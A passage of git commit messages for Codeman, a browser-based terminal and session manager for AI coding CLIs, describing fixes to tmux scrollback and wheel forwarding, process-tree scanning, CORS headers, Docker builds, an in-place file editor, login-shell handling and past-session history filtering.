Key Patterns bullets, and commit the fix plan with a status header
describing what shipped and where it deliberately diverged (narrow strip
plus re-pull instead of tmux mouse on; viewport-at-bottom gate dropped).
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Remote Claude sessions were the one backend left relying on the
startup-banner scrape for cliVersion (the unreliable path #154 was filed
for: newer Claude Code builds print no banner and resumed sessions never
do), so wheel/touch forwarding silently stayed off for them. Mirror the
docker approach: a deferred best-effort probe at session start, running
claude --version on the remote host through the same
buildSshConnectionArgs + login-shell wrapper as the real launch, parsing
the first semver in stdout (an interactive login shell may echo rc-file
noise around it).
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Touch drags and flick momentum on forwarding-capable sessions (codex,
claude >= 2.1.187) now go to the CLI as coalesced SGR wheel reports via
the shared _forwardScrollToApp helper, exactly like the desktop wheel:
snap the viewport home first, then encode. Before this, every phone or
tablet swipe scrolled the local buffer of stale repaint frames and
dragged the CLI's pinned input box off the screen (the mobile half of
issue #205). The _shouldForwardWheelToApp gate is shared, so the
local-scrollback opt-out setting and the CLI version gate apply to touch
exactly as they do to the wheel; shell and other local modes keep the
existing local touch scrolling and the scroll-to-top history re-pull.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Reported against the beta: scrolling up in a Claude session drags the prompt
box and status line up the screen along with everything else, and only once
the local buffer hits its top does the CLI's own history start moving.
_shouldForwardWheelToApp() gated forwarding on the viewport being at the buffer
bottom, so that leaving the bottom handed the wheel back to local scrollback and
both histories stayed reachable. Two things make that the wrong default:
- A repaint-mode CLI keeps no terminal scrollback of its own (tmux reports
history_size=0 for a Claude pane), so xterm's buffer holds only Codeman's
REPLAYED repaint frames. Scrolling those locally moves the CLI's pinned
furniture and shows stale frames underneath.
- scrollToLastNonEmptyLine() parks the viewport `rows - 2` above the last
non-empty row, so any session with trailing blank rows was left off-bottom
and every later wheel event went local without the user ever scrolling.
Forward unconditionally for the verified modes instead, and snap the viewport
back to the bottom before encoding the report (SGR coordinates address the live
screen, and forwarding while the user stares at stale scrollback looks dead).
Shift+wheel and the "Wheel scrolls local history" opt-out still reach local
scrollback.
Verified against a real Claude 2.1.223 session: wheel-up scrolls its transcript
back 48 lines (rows showing 85-92 -> 37-44) while the input box, separator and
status line stay fixed at the bottom.
Four fixes for the scrollback reports in #205 (plus its follow-up comment).
1. tmux-backed shell/opencode/antigravity sessions were parked in xterm's
ALTERNATE buffer for their whole life. The tmux CLIENT emits smcup
(\x1b[?1049h) as its first bytes on attach, and the existing strip is gated
to claude/codex/gemini, so it reached the browser verbatim. In the alternate
buffer baseY is pinned at 0 (no scrollback, so touch scrolling is a no-op)
and xterm's own wheel handler translates the wheel into \x1bOA cursor keys,
which readline receives as shell history navigation. Both reported symptoms,
one sequence. isMuxAltScreenOnlyStripMode() now strips that toggle for those
modes, but ONLY under tmux (the direct-PTY fallback still needs a program's
own alt screen) and ONLY the alt-screen toggle: 3J from a user's `clear` and
the mouse DECSETs a pane's htop/vim rely on are left alone. Safe because tmux
never forwards a pane's alt-screen toggles to its client, it repaints;
captured from a real attach, vim/less/htop emit zero.
2. "Load more history" on scroll-to-top. xterm's buffer is only ever a window
onto tmux's history, and tmux repaints the pane rectangle instead of emitting
linefeeds whenever output outpaces its flush, OVERWRITING already-rendered
scrollback. Measured: a 60-line burst added 1 row and destroyed 34, while the
same 60 lines emitted slowly added all 60. Scrolling up at the top now
re-pulls the full tmux scrollback and holds the user's place. Verified
end to end: 42 rendered rows -> 213, recovering all 150+60 printed lines.
3. The full-scrollback replay was gated on a single "first load after page load"
flag, which whichever session auto-selected consumed, so every other tab
started with one visible frame. Now tracked per session.
4. _wheelScrollLines ignored ev.deltaMode, so Firefox (DOM_DELTA_LINE, deltaY 3
per notch) scrolled one line where Chrome scrolls four or five, and capped
the forwarded SGR report at one tick. Line and page deltas are now converted,
and a pure horizontal swipe no longer falls through to a phantom -1.
Analysis and measurements: docs/scrollback-issues-analysis.md
Both input paths recorded the (clientId, seq) pair as applied and acknowledged the
frame BEFORE knowing whether the write had landed: the POST route because its mux
write is fire-and-forget so the response never waits on a tmux child, the
WebSocket handler because it ACKed unconditionally.
When the write then failed, the client dropped the frame from its durable queue
and the server rejected the retry as a duplicate. The reliable-delivery layer was
guaranteeing exactly-once delivery of something that had never been delivered —
and `Session.write()` returned void, so a session whose PTY was gone swallowed the
data with no signal at all.
- `forgetInputSeq()` rolls the bookkeeping back on failure, but only when that seq
is still the newest one; a later input has superseded it and must not re-open.
- The WebSocket handler withholds its ACK when the write did not land, so the
client redelivers.
- `Session.write()` reports whether it reached a PTY.
Response codes are unchanged, deliberately: a session can legitimately have no PTY
yet, and turning that into a failure status would be a contract change of its own.
What this does NOT do: remove the root cause. The POST still answers 200 before
the mux write is attempted, so a client that treats any 2xx as final cannot learn
about that failure. What closes is the narrower window — the write failed AND the
ACK never reached the client — plus the whole WebSocket path. Closing the rest
would mean awaiting the tmux child inside the request.
9 tests. They drive the HTTP route, not only the Session primitives: with the
rollback removed from the route, 2 of them fail.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
`getChildPids` ran `pgrep -P <pid>` per node and recursed with no visited set, no
depth limit and no node cap. Two further sites forked a `pgrep` per session on
every stats tick.
Across ~28 adopted tmux trees the fan-out exploded, and because each `pgrep`
blocks in the kernel while reading `/proc/<pid>/cgroup` under WSL, none returned
while the walk kept spawning more. Observed: ~13,000 `pgrep` processes stuck in
D-state out of ~39,000 total, load average above 13,000, and a machine only
recoverable by restarting WSL — which cost every running session. Every diagnostic
command timed out too, because they read /proc as well.
- ONE `ps -eo pid=,ppid=` snapshot, cached briefly and refreshed asynchronously
with a single-flight guard. Async matters: under the same procfs pathology,
`execSync`'s timeout cannot return (spawnSync waits for the unkillable child),
which would freeze the server where a hung async poll only costs staleness.
- The traversal moved to `proc-tree.ts` as a pure function — breadth-first, with a
visited set (a stale snapshot can contain a cycle), a depth cap and a node cap,
both reporting when they truncate. Pure so the regression tests can exercise the
shipped code rather than a copy of it.
- The kill path forces a fresh snapshot: the wait between SIGTERM and the survivor
re-scan (200ms) sits inside the cache TTL (2000ms), so reading the cache there
would return pre-SIGTERM state and aim SIGKILL at stale PIDs. That wait is
bounded, so a wedged `ps` cannot stop killSession from reaching its
process-group and tmux fallbacks.
- Any `ps` error keeps the previous snapshot instead of caching partial output as
fresh; a truncated table would make whole subtrees invisible to the kill path.
13 tests, including one that drives TmuxManager itself — with the caps bypassed at
the call site, 3 of them fail. The snapshot refresh is stubbed there, because
otherwise the manager runs a real `ps`, replaces the fixture, and the test
silently measures the machine's own process tree instead.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
`reply.raw.writeHead()` writes straight to the Node response and bypasses
Fastify's header store, so everything the `onRequest` security hook granted is
silently dropped on every route that answers that way.
The visible symptom is CORS. The hook emits `Access-Control-Allow-Origin` for
localhost origins, so a page served from a local dev server may call every `/api`
endpoint cross-origin — except the four below, whose requests fail. The security
headers (`X-Content-Type-Options`, `X-Frame-Options`, CSP) were being lost the
same way.
Affected: `GET /api/events`, and `file-raw` / `tail-file` / `download` in
file-routes.ts. Each now spreads the inherited headers first and lets its own
headers win over them.
Tests drive a real WebServer and compare `/api/events` against `/api/status` for
the same Origin — the point of the fix being that the SSE route stops being the
odd one out. Verified in both directions: with the fix removed, 3 of the 5 fail.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
The CLIs live in one `RUN npm install -g` layer, so rebuilding without
--no-cache re-uses it and freezes them at the versions the image was FIRST
built with. Editing the Dockerfile does not help when the edit lands below
that line: the npm layer stays cached and only the new step runs.
That is not hypothetical. Adding the Antigravity step (which appends below
the npm line) produced a "successful" rebuild that silently kept a stale
@openai/codex@0.144.6 whose aliased platform binary had never installed, so
every codex docker case died with "Missing optional dependency
@openai/codex-linux-x64" while the build reported success. A --no-cache
rebuild fixed codex and also un-froze claude, gemini and opencode.
Documents the failure, makes --no-cache the recommended invocation in both
the guide and the CLAUDE.md quick-reference row, and adds a verify command
that actually executes each CLI, since a zero exit code only proves the
layers ran.
No changeset: docs-only, rides the next release.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
The bullet read as a blanket "Codeman has no sandbox", which is wrong and
undersells a headline feature. Two different axes were conflated:
- Integration code cannot be sandboxed by Codeman because Codeman never
launches it. It is the reader's own process, started by them.
- Agent workloads are sandboxed per case via Docker cases, which is the
documented isolation story.
Scopes the claim to integration code and links docs/docker-cases.md, noting
that an integration driving a Docker-backed session inherits that isolation
because it is a property of the session, not the caller.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Adds a pointer to docs/extending-codeman.md at the end of the API section in
README.md and README.zh-CN.md, so the guide is reachable from where people
read about endpoints rather than only from CLAUDE.md.
Reading the README's programmatic guide alongside the new page surfaced three
errors in it, all now fixed:
- POST /api/sessions/:id/input takes `useMux`, not `useScreen`. The latter is
a legacy name that no longer appears in the schema.
- The page told integrators to send `\r` to submit. With `useMux: true` the
server delivers text and Enter as two separate writes (writeViaMux does
send-keys -l then send-keys Enter), so appending `\r` is wrong.
- "Unwrap the envelope" was incomplete: a few legacy GETs put the payload at
the top level, so the advice is now `body.data ?? body`.
Also cross-references the README's programmatic guide, which covers the
in-session case (CODEMAN_MUX, CODEMAN_API_URL, CODEMAN_SESSION_ID,
CODEMAN_HOOK_SECRET_FILE) that the new page deliberately does not duplicate,
and documents the optional clientId/seq exactly-once fields.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Antigravity (agy) was wired into the session layer but never propagated to
the surfaces around it, while Gemini CLI stayed documented as a consumer
product despite being enterprise-only since Google's cutover. Gemini keeps
full support; Antigravity now sits beside it everywhere.
Functional fixes:
- docker/agent.Dockerfile never installed agy, so a docker case with
mode 'antigravity' died on command-not-found. agy is not on npm, so it
gets its own installer step. --dir /usr/local/bin is load-bearing: the
default $HOME/.local/bin resolves to root's home at build time and is
unreachable by the `agent` user the container runs as. Verified inside
codeman/agent:base (v1.1.10, reachable as `agent`). Note the binary is
~190MB, the largest layer in the image.
- Welcome screen gained a Run Antigravity action, gated on agy being
present like the other CLI buttons, with a cyan identity matching the
toolbar run button and run-mode dot.
- install.sh now detects agy (search paths mirroring the resolver), counts
it as a satisfying AI CLI, and recommends it over Gemini in the install
hints. Detection only, no new auto-install path.
Docs corrected where they were factually wrong:
- architecture-invariants documented isExternalCliMode() as
opencode/codex/gemini when the code has included antigravity for a
while, said "all three modes", and omitted ANTIGRAVITY_ from the env
prefix allowlist row.
- cron-guide's agentType enum, cron-discovery's SessionMode, and
remote-sessions' RemoteCommandMode were all stale.
Also: README + README.zh-CN (five CLIs, Gemini marked enterprise-only),
package.json keyword, and comment drift in 8 places.
test/run-mode-ui.test.ts now covers the new welcome button; verified it
fails without the settings-ui wiring.
Antigravity nests its whole state under ~/.gemini/antigravity-cli/, not
~/.antigravity, so the existing .gemini docker credential seed already
covers it. Recorded as a comment so nobody adds dead config later.
isAltScreenStripMode() deliberately still excludes antigravity: whether
its TUI needs the alt-screen strip is a behavioural question that needs a
real agy session, not a guess.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Codeman has no plugin runtime by design: running third-party code inside
the process that spawns agents, on a server people expose over a tunnel,
would trade away the security posture that is a reason to use it. But it
already has four extension seams that work from any language with nothing
installed, and they were undocumented.
Documents web tabs (render your own UI as a tab), the SSE event channel
(react when an agent needs you), the HTTP API plus the codeman CLI (drive
it from a script), and hook events. Every endpoint, schema field, event
name and header in the page was read from source and then verified against
a running instance, including the localhost-only CORS behavior and the SSE
framing the example depends on.
Also corrects a stale line in CLAUDE.md: it claimed the HTTP/SSE API was
internal/unstable, which contradicts docs/versioning-policy.md, where the
API under /api/v1 was finalized as part of the stable surface for the 1.0
cut. No new stability commitment is made here; the page makes an existing
one discoverable.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Two design/reference docs for the planned native-macOS VM isolation tier
("VM cases"), a location overlay on cases in the same shape as Docker and
remote-SSH cases, never a sixth SessionMode. Nothing is implemented; both
docs are marked PLANNED and are blocked on macOS 27 GA.
- vm-cases-plan.md: the Codeman-side design and phased plan. Swift helper
CLI, DiskImageKit base + per-case overlay, sessions riding the existing
remote-SSH machinery, VirtioFS workspace at the same absolute path, and
seeded credentials, each mirroring an established Docker-cases rule.
- vm-subsystem-apple-stack.md: what the Apple stack actually provides,
measured on the 27 beta rather than inferred from the WWDC session. Of
note: the 2-concurrent-macOS-VM cap is a kernel quota (refused at 39%
free RAM, so more hardware does not help), DiskImageKit has no flatten
API so exports must ship the layer chain, and a macOS guest renders
nothing without an attached view in an unlocked host session.
No credentials, hostnames, tailnet addresses or account names in either
file; every host/guest reference is a placeholder.
Also joins a table row that a stray blank line had split off into its own
malformed table.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
#215 filters non-interactive transcripts out of Past Sessions with
`entrypoint !== 'cli'`. That is an allowlist on a value, and the check
hides rows, so it fails CLOSED on anything Claude Code has not shipped
yet: the day it stamps a new interactive entrypoint (a rename, or a
second interactive host), no transcript matches 'cli' any more and the
entire Past Sessions list goes blank with nothing in the UI explaining
why.
Invert it to a blocklist on the SDK shape (`sdk`, `sdk-cli`, `sdk-py`).
An automated entrypoint we do not recognize yet now costs a few noisy
rows, which is the annoyance the filter set out to fix, rather than a
dead feature. Matches the fail-open reasoning #215 already applied to a
MISSING entrypoint field; only the unknown-VALUE case was inverted.
Test fails against the pre-fix line and passes after.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
extractTranscriptEntrypoint returned the FIRST entrypoint-bearing message's
value instead of scanning for any 'cli' occurrence, so a transcript that
started under an older Claude Code build (no entrypoint field) and later
picked up a non-'cli' entrypoint on some later message was wrongly excluded
from history — the opposite of the fail-open behavior the function's own
comment claimed. Now returns 'cli' the moment any scanned message carries it,
and only falls back to a non-cli value when nothing else qualifies. Head/tail
entrypoints are merged the same way (either side being 'cli' wins).
Also restructures scanProjectDir's head read into two tiers: try 16KB first
and escalate to 128KB only when that wasn't enough, instead of reading 128KB
for every file unconditionally. Measured against a real ~/.claude/projects
tree, the unconditional-128KB version roughly quadrupled scan cost to fix a
problem only a minority of files actually have; the two-tier version cuts
bytes read by ~36% and wall time by ~17% while producing identical output.
Also fixes a fallback regression where a failed head read (e.g. EMFILE) on a
file at or under the head buffer size no longer got a shot at the tail-read
fallback, silently dropping the session from history.
The comment implied the fallback could be "silently skipped" by the
stale hardcoded threshold, which isn't actually true -- the old
smaller numbers were always more eager to trigger the fallback, never
less (same correction as the commit this test belongs to). What the
test actually protects against is the fallback logic itself breaking
(e.g. a copy-paste slip dropping the check entirely), not the exact
threshold value. Reworded to say that.
Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com>
Two follow-ups from reviewing the entrypoint-filter and head-buffer
fixes before submitting them upstream:
1. extractTranscriptEntrypoint() scanned any line containing the
substring "entrypoint", not specifically the first "type":"user"/
"type":"assistant" message line (unlike its sibling
extractFirstUserPrompt, which does scope to type). A transcript
that started under an older Claude Code version (no entrypoint
field) and got resumed under a newer one mid-conversation could
pick up the field from a much later message than the true first
one, misattributing the session's origin. Scoped it to match.
2. Added a regression test proving the tail-read fallback still
engages correctly when bookkeeping accumulation exceeds even the
new 128KB head window, not just the 16KB it previously blanked at.
Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com>
Blank firstPrompt rows weren't all oversized messages -- traced one
directly: a session restarted many times (mux deaths, redeploys)
accumulates a batch of small bookkeeping lines (mode/permission-mode/
last-prompt/queue-operation, one batch per restart) ahead of the real
first message. With enough restarts these alone crossed the old 16KB
head-read window, so extraction found nothing even though the actual
first message was tiny (measured case: ~17.5KB of bookkeeping pushed a
189-byte real message just past the boundary).
Raise the head buffer from 16KB to 128KB (matching the existing
precedent at the codex-history head-read a few hundred lines up) and
fix three now-stale `> 16384`/`> 65536` fallback thresholds to
reference headBuf.length instead of hardcoded numbers, so the tail-read
fallbacks stay correctly scoped to "beyond what head already covered."
Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com>
COD-140's backfill was meant to cover live/persisted rows whose Codeman
id doesn't match an on-disk transcript UUID, guessing from the newest
transcript in the same workingDir as a last resort. It was also firing
for pure history rows whose OWN transcript scan already ran (and
genuinely found nothing, e.g. an oversized first message) -- those got
silently backfilled with the newest OTHER session's opening line from
the same directory. Not a blank row, but actively wrong: old sessions
displayed a completely unrelated (often today's live) conversation's
first prompt as if it were their own.
Skip the workingDir guess for any item that already has its own
'history' source -- it already had a real, direct attempt. Rows with
no history source at all (their transcript isn't linked/scanned under
their own id yet) still get the guess, matching the original intent.
Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com>
Automated tools (CI review bots, etc.) invoke Claude Code via the SDK
and write their transcripts into the same ~/.claude/projects tree as
real interactive sessions, but were never something a user can resume
into -- no PTY, no running process. Their one-shot review prompts also
embed the full diff inline as a single message, often exceeding the
16KB head / 32KB tail windows this scanner reads, so they cluttered
Past Sessions two ways: as blank rows when the huge message couldn't
be parsed, or as N identical "Review this change for security
vulnerabilities..." rows when it could.
Claude Code stamps `entrypoint` on its own message records ('cli' for
a real interactive session, e.g. 'sdk-py' for an SDK invocation).
Exclude any transcript whose entrypoint isn't 'cli' from the history
list entirely, checked last so it reuses whatever head/tail the prompt
extraction already read. Missing entrypoint (older transcripts) reads
as interactive -- fail open, matching every other gating check in this
codebase. Shared by /api/history/sessions and /api/sessions/unified,
since both call the same scanProjectDir().
Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com>
MOBILE_OVERVIEW_RUN_MODES / _buildMobileOverviewRunMenu is a separate,
hardcoded duplicate of the toolbar's #runModeMenu (mobile-overview.js
is a newer feature that mirrors the toolbar menu's look/behavior
rather than reusing its render), so it never picked up #201's
isCliAvailable() gating and offered every backend regardless of what
the server actually has installed.
Gate it the same way: skip an entry unless isCliAvailable(mode),
shell always exempt. Added functional + static regression tests
mirroring the toolbar menu's own test pattern.
Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com>
Closes#212. The file-preview overlay can now edit workspace text files in
place, phone-first: agent writes a file, you review it in the viewer, tweak
two lines, save, tell the agent to continue.
Backend (file-routes.ts, policy in src/config/file-editing.ts):
- GET file-content?edit=1: read-for-edit that never truncates (a truncated
buffer must never become an edit buffer), 512KB cap (413 over it), and
returns the sha256 hash + detected EOL the client echoes back on save.
- PUT /api/sessions/:id/file-content: edit-in-place only, with no O_CREAT
anywhere in the handler. Confinement matches the read path (realpath +
workspace boundary + ownership via findSessionOrFail), plus sensitive-path
and attachment-guard blocklists, a .git subtree deny, and an extension
allowlist (svg and env deliberately excluded). Optimistic concurrency via
baseHash: mismatch is a 409 unless force. Writes are wx-temp + fchmod +
fsync + rename, closing the validate-then-write TOCTOU window.
- Corruption guards: NUL sniff + UTF-8 round-trip compare (refuses binary
and latin-1), and server-side EOL re-application so a textarea's LF
normalization cannot rewrite every line of a CRLF file.
- Plain reads gain an additive editable flag the UI keys the button off.
Frontend (panels-ui.js + overlay markup/styles):
- Edit button on editable text previews; textarea editor with Save/Cancel,
dirty indicator, discard-confirm on cancel/close, and a conflict dialog
that offers overwrite (force) when the file changed on disk mid-edit.
- Phone: full-bleed window sized by --app-height so the editor and Save bar
track the OS keyboard; 16px editor font (iOS zoom guard); no autofocus.
- zh-CN strings for the new chrome.
Tests: pure policy unit tests plus a route suite that deliberately does NOT
mock node:fs. It runs against a real temp workspace so symlink escapes,
write-through of in-workspace symlinks, mode preservation, CRLF round-trip,
409/force, and the no-create property are exercised for real. Also verified
end to end on an isolated beta instance: 39-check curl matrix, Playwright
desktop flow (real clicks and typing, bytes asserted on disk, live conflict
with an external rewrite), and a 393px phone profile.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Closes#211. Copying from the terminal only worked through the browser
context menu, because xterm turns Ctrl+C into 0x03 and cancels the keydown,
so the muscle-memory copy failed silently and read as "no copy-paste at all".
With a selection, Ctrl+C now copies it, toasts, clears the selection and
sends nothing to the PTY. With no selection it falls through unchanged, so
the interrupt is intact. Ctrl+Shift+C is an explicit copy chord that never
falls through: an explicit copy that interrupts a running agent because the
selection happened to be empty would be a footgun.
Three details that keep the interrupt safe:
- The decision lives in attachCustomKeyEventHandler (terminal-ui.js) and the
no-selection path returns true WITHOUT preventDefault. xterm calls the
custom handler before its own cancel(), so returning false alone does not
cancel the event; the copy path therefore calls preventDefault explicitly,
or the browser would run its native copy on top of ours.
- copy-selection is a full registry entry (rebindable and disableable in App
Settings) whose action is deliberately absent from SHORTCUT_ACTIONS, the
same trick command-palette uses: the generic capture loop preventDefaults
every match it dispatches, which would cost the user the interrupt key.
- The gate is keydown-only, since the custom handler also runs for keypress
and keyup.
Copy goes through _copyText (Clipboard API, then hidden-textarea +
execCommand) rather than raw navigator.clipboard, because install.sh's LAN
option serves plain HTTP where navigator.clipboard is undefined; the
fallback steals focus, so the terminal is refocused afterwards.
Tests: test/terminal-copy-selection.test.ts pins the gate and the
SHORTCUT_ACTIONS invariant; test/terminal-copy-shortcut.test.ts drives real
key presses in chromium and asserts on the clipboard plus the bytes xterm
emitted (browser-driven, so excluded from test:ci like the other Playwright
suites). Verified manually on an isolated beta instance before landing.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Follow-up to #200 and #201, which gate the welcome buttons and the run-mode
dropdown on whether the CLI is actually installed. Four corrections:
1. #200 also DELETED the Cloudflare Tunnel welcome button and the QR widget
outright. Its rationale is right (offering a tunnel where cloudflared is not
installed is a bad default) but the conclusion overshoots: the welcome QR is
the whole scan-to-connect-from-your-phone flow, and deleting it left a large
block of live tunnel code in settings-ui.js driving elements that no longer
existed. Both are restored and the button is gated on cloudflared, which is
what the stated rationale actually asks for. New cloudflared-resolver.ts
mirrors the CLI resolvers, and TunnelManager now shares its search path so
the button and the spawn can never disagree about where cloudflared lives.
2. Antigravity was missing from the run-mode gating, the one run mode LEAST
likely to be installed. It slipped past because #201 predates it. Covered
now, plus a static test that fails if a sixth mode reaches the dropdown
without being gated, so the next one cannot slip the same way.
3. The per-surface fetches are replaced by the injected availability object
already used for the Codex settings tab, so the codebase has one mechanism
rather than two. The status routes buy nothing as a gating source: every
resolver memoizes its PATH probe server-side, so a fetch is exactly as stale
as an injected value while costing a round trip every time the dropdown opens
and leaving the welcome buttons to flicker in after paint. The routes
themselves stay, including the /api/claude/status that #200 adds.
4. Unknown availability now reads as AVAILABLE for run buttons. Both PRs hid the
button on a failed fetch, so a blip left a working install with nothing to
click; a genuinely missing CLI only ever produced an error toast. The Codex
settings TAB keeps the opposite default, since hiding it costs nothing.
The dropdown query is also scoped to the menu: `.run-mode-option` is the class
the saved-dashboard and history rows use too, and a document-wide querySelector
would have found whichever came first in the DOM.
Fixes a latent environment-sensitivity in 816d900 while here: the index-title
test asserted the template was untouched apart from the title, which held only
on a machine with no codex installed.
Verified end-to-end against a real server on an isolated instance+socket, with
Playwright: gemini/codex hidden and claude/opencode/antigravity/shell shown,
matching this host, tunnel button back, Codex settings tab still hidden, no
console errors. Full test:ci sweep green (3902 tests).
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Follow-up to #209 and #210. Both land a real fix (a pane that is a login shell
picks up /etc/profile and the per-user PATH entries an ssh remote command never
sees, which is what was failing agent CLIs with exit 127). Three corrections:
1. `-i -l` is no longer hardcoded onto the resolved shell. That path ultimately
comes from the passwd entry, which is user data and can name anything, and a
shell that rejects an unknown flag exits on the spot: nushell, elvish and xonsh
take neither flag, so a user with one of those in passwd would have gotten a
dead pane on arrival, which is exactly the #208 failure #209 builds on top of.
loginShellArgs() applies them only to the POSIX-family shells verified to
accept both, and a test really launches every allowlisted shell present on the
machine rather than trusting the set. csh/tcsh are excluded deliberately: tcsh
honors -l only when it is the ONLY flag.
2. `remain-on-exit on` -> `failed`, moved LAST in the tmux command chain. `on`
keeps the pane after a CLEAN exit too, so typing `exit` in a remote shell
stranded a dead pane, the session outlived it, and the next launch's `-A`
reattached to that corpse: "Pane is dead (status 0)" instead of a shell,
permanently, on the DEFAULT path. Verified against a real tmux, as was the
fix: `failed` tears the session down on status 0 and keeps the pane on 127
with the "command not found" still on screen, which is the case #210 wanted.
It is last because tmux aborts the remaining commands of a `\;` sequence once
one errors (also verified) and `failed` needs tmux >= 3.2 on the REMOTE host;
leading, a rejection there would have silently dropped status/mouse/prefix/
escape-time/window-size along with it.
3. `$SHELL` -> `"${SHELL:-/bin/sh}"`, via one shared remoteLoginShellCommand()
helper instead of the string being rebuilt in tmux-manager as well.
Also corrects the rationale both PRs carried: a tmux pane already hands the shell
a tty, so it was interactive all along ($- contains i for a bare /bin/bash in a
pane) and ~/.bashrc was always being sourced. `-l` is the flag doing the work.
End-to-end verified, not just unit-tested: the emitted remote pane command was
run through all three quoting layers under a minimal sshd-style PATH with the
CLI installed only on a login-shell PATH entry, and it resolved and launched the
CLI with its arguments intact and a space-containing remote path preserved.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Follow-up to #202. The dotdir decode landed there was reachable only when
nothing else matched first, and in the greedy half it was not reachable at all.
decodeProjectKey() splits the project key on '-', so the '/.' that the encoder
collapses leaves an EMPTY segment behind. Both loops offered that empty string
as a candidate directory name, and isDir(current + '/' + '') stats current + '/',
which always succeeds. So the empty segment matched unconditionally:
- backtracking half: ~/.sib resolved to "/home/x//sib" whenever a non-dot
sibling ~/sib existed (wrong directory, and a doubled slash that then fails
every string comparison against session.workingDir). Without a sibling it
only backtracked out by luck.
- greedy half: that loop is shortest-match-first, so the empty candidate
matched on the FIRST iteration and set matched=true, leaving #202's dotdir
branch permanently dead there.
An empty string is never a real path component, so skip it in both loops. The
unmatched tail then has to handle the empty segment too, or it would append a
bare '/' and re-introduce the '//' path it just stopped producing; it now emits
the dotdir guess instead, which is what the encoder implies.
Regression test asserts both halves: the dotdir wins over the non-dot sibling,
and the result never contains '//'. Verified it fails on #202 as merged.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Both settings on the App Settings "Codex CLI" tab (bypass approvals, animated
status effects) are handed to `codex` at launch, so on an instance where the
binary does not resolve the tab offers choices nothing can act on. Gate it on
availability instead.
renderIndexHtml injects window.__codemanCodexAvailable, mirroring the existing
gesture-availability flag, and settings-ui.js hides the tab button when it is
absent. Injected rather than fetched on modal open so the tab cannot flicker in
and back out; isCodexAvailable() memoizes its PATH probe, so the per-render cost
is nil. Installing codex later needs a restart, exactly like the
/api/codex/status route that already backs the Run menu. Solo popups skip the
probe since they have no settings modal.
Only the tab BUTTON is toggled. The panel already carries
.modal-tab-content.hidden unless it is the selected tab and openAppSettings()
always reopens on Display, so an unreachable button keeps the panel unreachable.
The inputs stay in the DOM and are still populated and read back on save, so a
user without codex cannot silently wipe the codex preferences of an instance
that has it. Animations stay off by default for new local Codex sessions.
Verified in a browser on this host, which has no codex: the flag is absent, the
Codex tab is hidden while the other tabs are unaffected, and saving App Settings
with the tab hidden leaves codexAnimationsEnabled/codexDangerouslyBypassApprovals
untouched. With the flag forced on, the tab appears, its panel opens, and
toggling the visible slider persists. The openAppSettings coupling test was
checked to fail when the call is removed.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Shell-mode sessions resolve to an absolute shell path (issue #208's
fix) but launch it bare, with no -i/-l flags. Without those, the
spawned shell runs as a non-interactive child of the non-interactive
`bash -c` that launches the pane, so it never sources ~/.zshrc or
~/.bashrc — silently dropping aliases, PATH additions, and tool init
(zoxide, nvm, etc.).
Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com>
decodeProjectKey() couldn't recover a dotdir path (e.g. ~/.codeman) from
Claude Code's encoded project-key names: the encoder maps both '/' and
'.' to '-', so the decoder's candidate joins never matched a hidden
directory on disk. It silently fell through to bare $HOME instead,
which corrupted workingDir for any resumed session under a dotdir case
(observed on ~/.codeman itself: history rows and state.json recorded
"/home/timkjr" instead of "/home/timkjr/.codeman").
Add a dot-prefixed candidate to both the backtracking decoder and its
greedy fallback so a leading empty split segment (the signature of a
literal '.' in the original path) is retried as a hidden directory.
Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com>
runAntigravity() landed on master after this branch was cut, so it kept the
exact pattern the rest of this PR removes: terminal.clear() plus direct
writeln into whatever session happened to be active. Merging master in
surfaced it, leaving one of six run modes still wiping the active session's
xterm on launch.
Also adds regression coverage that can actually see the bug. The existing
test drives the three helpers directly, so it stays green even when a run*()
function is reverted to writing at the terminal itself: reverting
runClaude()'s call site keeps all 16 tests passing. The new static guard
scans session-ui.js and fails if any run*() body touches
this.terminal.clear/writeln, which catches a regressed call site and would
have caught runAntigravity on its own. A second unit test covers the
home-screen path that nothing exercised: with no active session, launch
progress must still clear and render in the terminal.
Verified in a browser against a live instance. With a session active,
runShell() and runAntigravity() leave its terminal untouched (clear() calls:
0, writes: 0) and emit one info toast; on master the same run wipes the
session's marker text. The session-less home screen still clears and writes
exactly as before.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
remain-on-exit (previous commit) preserved dead remote panes instead of
destroying them, which revealed the real failure: `exec claude`/`exec
opencode` ran under ssh's non-interactive, non-login remote-command
shell, which only sees sshd's minimal default PATH — not the ~/.zshrc
PATH entries where these CLIs actually live (e.g. ~/.local/bin,
~/.opencode/bin). Wrap them in `$SHELL -i -l -c '<cmd>'`, mirroring the
fix shell mode already had.
Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com>
Remote shell-mode sessions hardcoded 'exec bash -l', ignoring the
remote user's actual login shell. sshd sets $SHELL from the remote
user's /etc/passwd entry, so 'exec $SHELL -i -l' launches their real
